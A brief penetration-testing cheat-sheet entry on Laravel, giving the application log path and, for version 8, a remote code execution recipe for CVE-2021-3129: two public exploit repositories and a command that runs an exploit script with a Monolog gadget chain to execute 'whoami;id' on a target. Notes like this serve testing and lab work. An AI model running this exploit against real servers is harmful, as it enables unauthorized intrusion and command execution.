# laravel

### Interesting Paths

```
# log file path
APP-NAME/storage/logs/laravel.log
```

## Laravel RCE

v 8

```
https://github.com/nth347/CVE-2021-3129_exploit
python3 exploit.py http://IP:PORT Monolog/RCE1 "whoami;id"


https://github.com/zhzyker/CVE-2021-3129
```
